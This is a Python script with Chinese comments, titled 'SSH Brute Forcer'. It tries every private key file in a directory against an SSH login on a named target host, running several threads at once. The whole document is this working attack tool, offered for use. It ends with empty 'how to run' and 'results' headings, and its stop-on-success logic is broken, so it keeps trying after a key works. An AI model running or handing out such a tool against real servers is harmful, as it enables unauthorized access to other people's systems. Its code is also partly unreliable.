import paramiko
import argparse
import os
from threading import Thread, BoundedSemaphore
# 设置最大连接数
maxConnections = 5
# 创建一个有界信号量,用于控制同时进行的连接数
connection_lock = BoundedSemaphore(value=maxConnections)
# 用于控制是否停止所有线程的全局变量
Stop = False
# 用于记录失败连接次数的全局变量
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
# 创建SSH客户端实例
client = paramiko.SSHClient()
# 设置SSH客户端自动添加主机密钥
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# 尝试使用提供的密钥文件连接到SSH服务器
client.connect(hostname=host, username=user, key_filename=keyfile)
# 如果连接成功,打印成功信息
print(f"[+] Success with key: {keyfile}")
except paramiko.AuthenticationException:
# 如果认证失败,打印认证失败信息
print(f"[-] Authentication failed, please verify the key: {keyfile}")
except paramiko.SSHException as e:
# 如果发生SSH异常,打印错误信息并增加失败次数
print(f"[-] SSH error: {e}")
Fails += 1
except Exception as e:
# 如果发生其他异常,打印错误信息
print(f"[-] Error: {e}")
finally:
# 如果release为True,则释放信号量
if release:
connection_lock.release()
# 如果客户端存在,则关闭客户端连接
if client:
client.close()
def main():
# 创建命令行参数解析器
parser = argparse.ArgumentParser(description='SSH Brute Forcer')
# 添加命令行参数:目标主机
parser.add_argument('-H', '--host', required=True, help='specify target host')
# 添加命令行参数:密钥文件目录
parser.add_argument('-d', '--directory', required=True, help='specify directory with keys')
# 添加命令行参数:用户名
parser.add_argument('-u', '--user', required=True, help='specify the user')
# 解析命令行参数
args = parser.parse_args()
# 获取命令行参数的值
host = args.host
passDir = args.directory
user = args.user
# 如果缺少必要的参数,则打印帮助信息并退出
if not host or not passDir or not user:
parser.print_help()
exit(0)
# 遍历密钥文件目录中的所有文件
for filename in os.listdir(passDir):
# 如果已经找到正确的密钥,则退出程序
if Stop:
print('[*] Exiting: Key Found.')
exit(0)
# 如果失败次数超过限制,则打印警告信息并退出程序
if Fails > 5:
print('[!] Exiting: Too Many Connections Closed By Remote Host.')
print('[!] Adjust number of simultaneous threads.')
exit(0)
# 获取信号量,控制同时进行的连接数
connection_lock.acquire()
# 构造完整的密钥文件路径
fullpath = os.path.join(passDir, filename)
# 如果文件是公钥文件,则跳过
if filename.endswith('.pub'):
print(f'[-] Skipping public key file: {fullpath}')
connection_lock.release()
continue
# 打印正在测试的密钥文件
print(f'[-] Testing keyfile {fullpath}')
# 创建新线程来处理密钥文件的连接测试
t = Thread(target=connect, args=(user, host, fullpath, True))
# 启动线程
t.start()
if __name__ == '__main__':
# 如果直接运行该脚本,则执行main函数
main()
运行方法:
运行结果: